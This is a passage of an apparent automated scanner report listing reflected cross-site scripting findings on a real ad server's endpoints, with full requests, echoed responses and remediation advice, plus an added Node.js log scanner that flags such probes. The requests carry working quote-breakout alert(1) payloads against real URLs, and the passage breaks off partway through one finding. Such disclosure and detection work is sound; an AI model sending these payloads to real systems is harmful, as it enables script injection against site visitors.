Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 08-Jun-2011 14:00:23 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/q1.q.gc.6170/be_news;sz=300x250;net=q1;ord=949612198?85f88'-alert(1)-'6ad97540a80;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

3.9. http://a.collective-media.net/adj/q1.q.gc.6170/news [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.q.gc.6170/news

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 767f8'-alert(1)-'f18e09670b4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.q.gc.6170767f8'-alert(1)-'f18e09670b4/news;sz=728x90;ord=949588501? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; dc=dc; apnx=1; qcms=1; nadp=1; blue=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 443
Date: Mon, 09 May 2011 13:59:55 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 08-Jun-2011 13:59:55 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/q1.q.gc.6170767f8'-alert(1)-'f18e09670b4/news;sz=728x90;net=q1;ord=949588501;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

3.10. http://a.collective-media.net/adj/q1.q.gc.6170/news [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.q.gc.6170/news

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 95e8d'-alert(1)-'5badbfc0af3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.q.gc.6170/news95e8d'-alert(1)-'5badbfc0af3;sz=728x90;ord=949588501? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; dc=dc; apnx=1; qcms=1; nadp=1; blue=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 443
Date: Mon, 09 May 2011 13:59:56 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 08-Jun-2011 13:59:56 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/q1.q.gc.6170/news95e8d'-alert(1)-'5badbfc0af3;sz=728x90;net=q1;ord=949588501;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

3.11. http://a.collective-media.net/adj/q1.q.gc.6170/news [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.q.gc.6170/news

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8522d'-alert(1)-'9242ac13858 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.q.gc.6170/news;sz=728x90;ord=949588501?&8522d'-alert(1)-'9242ac13858=1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; dc=dc; apnx=1; qcms=1; nadp=1; blue=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 447
Vary: Accept-Encoding
Date: Mon, 09 May 2011 13:59:55 GMT
Connection: close
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 08-Jun-2011 13:59:55 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/q1.q.gc.6170/news;sz=728x90;net=q1;ord=949588501?&8522d'-alert(1)-'9242ac13858=1;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

3.12. http://a.collective-media.net/adj/q1.q.gc.6170/news [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.q.gc.6170/news

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6d6f8'-alert(1)-'b758fa577ec was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.q.gc.6170/news;sz=728x90;ord=949588501?6d6f8'-alert(1)-'b758fa577ec HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; dc=dc; apnx=1; qcms=1; nadp=1; blue=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 444
Date: Mon, 09 May 2011 13:59:51 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 08-Jun-2011 13:59:51 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/q1.q.gc.6170/news;sz=728x90;net=q1;ord=949588501?6d6f8'-alert(1)-'b758fa577ec;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

3.13. http://a.collective-media.net/cmadj/q1.q.gc.6170/be_news [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.q.gc.6170/be_news

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 68e19'-alert(1)-'d718795e000 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj68e19'-alert(1)-'d718795e000/q1.q.gc.6170/be_news;sz=300x250;net=q1;ord=949612198;ord1=727744;cmpgurl=http%253A//www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; brlg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Mon, 09 May 2011 14:00:26 GMT
Connection: close
Content-Length: 7406

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-19898961_1304949626","http://ad.doubleclick.net/adj68e19'-alert(1)-'d718795e000/q1.q.gc.6170/be_news;net=q1;u=,q1-19898961_1304949626,11f8f328940989e,polit,am.h-am.b-q1.polit_h-q1.none_m-dx.16-dx.23-dx.17-cm.ent_h-cm.music_h;;cmw=owl;sz=300x250;net=q1;ord1=727744;contx=polit;dc=w
...[SNIP]...
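Seen from the server side, the requests in findings 3.1 to 3.13 are a scanner walking every path segment and parameter of the adj and cmadj endpoints with the same probe shape, and the responses are all 200s. Whoever operates the nginx host would want to find those probes in the access log rather than in a scanner report. The block below is an added example, not part of the report: it parses nginx combined-format log lines (constructed here from the request lines of findings 3.1, 3.3, 3.5 and 3.13, with made-up client addresses and one made-up percent-encoded variant), decodes the request target and flags JavaScript string-breakout probes. Signature names, function names and the sample lines are this example's own.

```javascript
'use strict';

// Added example, not part of the report: detection over nginx access log lines.
// Sample lines are constructed from the request lines captured above; client
// addresses, the "-" referers and the %27-encoded second line are made up.
const SAMPLE_LOG = [
  `203.0.113.7 - - [09/May/2011:13:59:37 +0000] "GET /adj/cm.tribune950fa'-alert(1)-'706392fff78/uscell_ldev_300x600_05311;tgt=brand;sz=300x600;ord=5044004? HTTP/1.1" 200 471 "http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24"`,
  `203.0.113.7 - - [09/May/2011:13:59:37 +0000] "GET /adj/cm.tribune/uscell_ldev_300x600_05311;tgt=brand;sz=300x600;ord=5044004?&c672b%27-alert(1)-%27978317c40a6=1 HTTP/1.1" 200 475 "-" "Mozilla/5.0"`,
  `198.51.100.2 - - [09/May/2011:14:00:24 +0000] "GET /adj/q1.q.gc.6170/be_news;sz=300x250;ord=949612198? HTTP/1.1" 200 447 "http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages" "Mozilla/5.0"`,
  `198.51.100.2 - - [09/May/2011:14:00:26 +0000] "GET /cmadj/q1.q.gc.6170/be_news;sz=300x250;net=q1;ord=949612198;ord1=727744;cmpgurl=http%253A//www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages? HTTP/1.1" 200 7406 "-" "Mozilla/5.0"`,
];

// nginx "combined" format: ip ident user [time] "METHOD target PROTO" status bytes "referer" "ua"
const COMBINED_RE = /^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\S+) "([^"]*)" "([^"]*)"$/;

function parseCombined(line) {
  const m = COMBINED_RE.exec(line);
  if (!m) return null;
  return { ip: m[1], time: m[2], method: m[3], target: m[4],
           status: Number(m[5]), bytes: m[6], referer: m[7], ua: m[8] };
}

// Decode percent-encoding repeatedly (bounded) so %27 and %2527 both become a
// quote; a malformed sequence stops decoding instead of throwing. "+" is left
// alone: it is not a space in a path and the probes here do not use it.
function fullyDecode(s, maxRounds = 3) {
  let cur = s;
  for (let i = 0; i < maxRounds; i++) {
    let next;
    try { next = decodeURIComponent(cur); } catch (e) { return cur; }
    if (next === cur) return cur;
    cur = next;
  }
  return cur;
}

// A lone quote is legal in a URL path, so the signal is the shape that follows
// it: a string delimiter, an operator, then a function call.
const SIGNATURES = [
  // The exact probe this scanner used: five hex chars, quote, -alert(1)-, quote, eleven hex chars.
  { name: 'burp-xss-probe',      re: /[0-9a-f]{5}['"]-alert\(1\)-['"][0-9a-f]{11}/i },
  { name: 'js-string-breakout',  re: /['"]\s*[-+*\/]\s*[A-Za-z_$][\w$]*\s*\(/ },
  { name: 'script-tag',          re: /<\s*script\b/i },
  { name: 'javascript-uri',      re: /javascript\s*:/i },
];

// Returns null for a clean target, otherwise the matching signature names and
// whether the hit sits in the path (before "?") or in the query string.
function scanTarget(target) {
  const decoded = fullyDecode(target);
  const hits = SIGNATURES.filter(s => s.re.test(decoded)).map(s => s.name);
  if (hits.length === 0) return null;
  const q = decoded.indexOf('?');
  const inQuery = q >= 0 && SIGNATURES.some(s => s.re.test(decoded.slice(q)));
  return { hits, where: inQuery ? 'query' : 'path', decoded };
}

// One alert per offending line, keeping the fields an analyst needs next:
// the client, the status (200 means the server accepted the probe) and the
// referer, which names the publisher page that embedded the ad tag.
function scanLog(lines) {
  const alerts = [];
  for (const line of lines) {
    const rec = parseCombined(line);
    if (!rec) continue;
    const hit = scanTarget(rec.target);
    if (hit) alerts.push({ ip: rec.ip, time: rec.time, status: rec.status,
                           referer: rec.referer, ...hit });
  }
  return alerts;
}

console.log(JSON.stringify(scanLog(SAMPLE_LOG), null, 2));
```

The first line is flagged in the path and the second, where the probe sits in an arbitrary parameter name after `?`, in the query; the two clean lines, including the cmadj request whose cmpgurl value is double percent-encoded, produce nothing. The burp-xss-probe signature is deliberately narrow and only recognises this scanner's marker; the js-string-breakout signature is the one that would also catch a hand-written `'-eval(...)-'` variant.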

3.14. http://a.collective-media.net/cmadj/q1.q.gc.6170/be_news [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.q.gc.6170/be_news

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ba0fc'-alert(1)-'5132246e024 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/q1.q.gc.6170ba0fc'-alert(1)-'5132246e024/be_news;sz=300x250;net=q1;ord=949612198;ord1=727744;cmpgurl=http%253A//www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; brlg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Mon, 09 May 2011 14:00:26 GMT
Connection: close
Content-Length: 7398

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-67990008_1304949626","http://ad.doubleclick.net/adj/q1.q.gc.6170ba0fc'-alert(1)-'5132246e024/be_news;net=q1;u=,q1-67990008_1304949626,11f8f328940989e,polit,am.h-am.b-q1.polit_h-q1.none_m-dx.16-dx.23-dx.17-cm.ent_h-cm.music_h;;sz=300x250;net=q1;ord1=727744;contx=polit;dc=w;btg=am.h;btg=am.b;bt
...[SNIP]...

3.15. http://a.collective-media.net/cmadj/q1.q.gc.6170/be_news [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.q.gc.6170/be_news

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 99f75'-alert(1)-'434975d6399 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/q1.q.gc.6170/be_news99f75'-alert(1)-'434975d6399;sz=300x250;net=q1;ord=949612198;ord1=727744;cmpgurl=http%253A//www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; brlg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Mon, 09 May 2011 14:00:26 GMT
Connection: close
Content-Length: 7398

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-54782015_1304949626","http://ad.doubleclick.net/adj/q1.q.gc.6170/be_news99f75'-alert(1)-'434975d6399;net=q1;u=,q1-54782015_1304949626,11f8f328940989e,polit,am.h-am.b-q1.polit_h-q1.none_m-dx.16-dx.23-dx.17-cm.ent_h-cm.music_h;;sz=300x250;net=q1;ord1=727744;contx=polit;dc=w;btg=am.h;btg=am.b;btg=q1.pol
...[SNIP]...

3.16. http://a.collective-media.net/cmadj/q1.q.gc.6170/be_news [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.q.gc.6170/be_news

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3363c'-alert(1)-'29286281e7c was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. The sz value is a WIDTHxHEIGHT pair (300x250 in the request above) and is echoed twice, once inside the DoubleClick URL and once as a separate argument to createAndAttachAd; rejecting any value that does not match ^\d+x\d+$ before it is echoed closes this parameter, and the value should still be emitted as an escaped JavaScript string literal rather than pasted into the script source.

Request

GET /cmadj/q1.q.gc.6170/be_news;sz=3363c'-alert(1)-'29286281e7c HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; brlg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Mon, 09 May 2011 14:00:25 GMT
Connection: close
Content-Length: 7350

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
tachAd("q1-54258070_1304949625","http://ad.doubleclick.net/adj/q1.q.gc.6170/be_news;net=q1;u=,q1-54258070_1304949625,11f8f328940989e,none,q1.polit_h-q1.none_m-dx.16-dx.23-dx.17-cm.ent_h-cm.music_h;;sz=3363c'-alert(1)-'29286281e7c;contx=none;dc=w;btg=q1.polit_h;btg=q1.none_m;btg=dx.16;btg=dx.23;btg=dx.17;btg=cm.ent_h;btg=cm.music_h?","3363c'-alert(1)-'29286281e7c","",false);</scr'+'ipt>
...[SNIP]...

3.17. http://a.collective-media.net/cmadj/q1.q.gc.6170/news [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.q.gc.6170/news

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9676a'-alert(1)-'a645e4959d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj9676a'-alert(1)-'a645e4959d/q1.q.gc.6170/news;sz=728x90;net=q1;ord=949588501;ord1=275382;cmpgurl=http%253A//www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; blue=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Mon, 09 May 2011 13:59:59 GMT
Connection: close
Set-Cookie: qcdp=1; domain=collective-media.net; path=/; expires=Tue, 10-May-2011 13:59:59 GMT
Set-Cookie: exdp=1; domain=collective-media.net; path=/; expires=Mon, 16-May-2011 13:59:59 GMT
Set-Cookie: ibvr=1; domain=collective-media.net; path=/; expires=Mon, 16-May-2011 13:59:59 GMT
Set-Cookie: brlg=1; domain=collective-media.net; path=/; expires=Mon, 16-May-2011 13:59:59 GMT
Content-Length: 7925

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-79836878_1304949599","http://ad.doubleclick.net/adj9676a'-alert(1)-'a645e4959d/q1.q.gc.6170/news;net=q1;u=,q1-79836878_1304949599,11f8f328940989e,polit,am.h-am.b-q1.polit_h-q1.none_l-dx.16-dx.23-dx.17-cm.ent_h-cm.music_h;;cmw=owl;sz=728x90;net=q1;ord1=275382;contx=polit;dc=w;btg
...[SNIP]...

3.18. http://a.collective-media.net/cmadj/q1.q.gc.6170/news [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.q.gc.6170/news

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload db5a3'-alert(1)-'52fdd678b0b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/q1.q.gc.6170db5a3'-alert(1)-'52fdd678b0b/news;sz=728x90;net=q1;ord=949588501;ord1=275382;cmpgurl=http%253A//www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
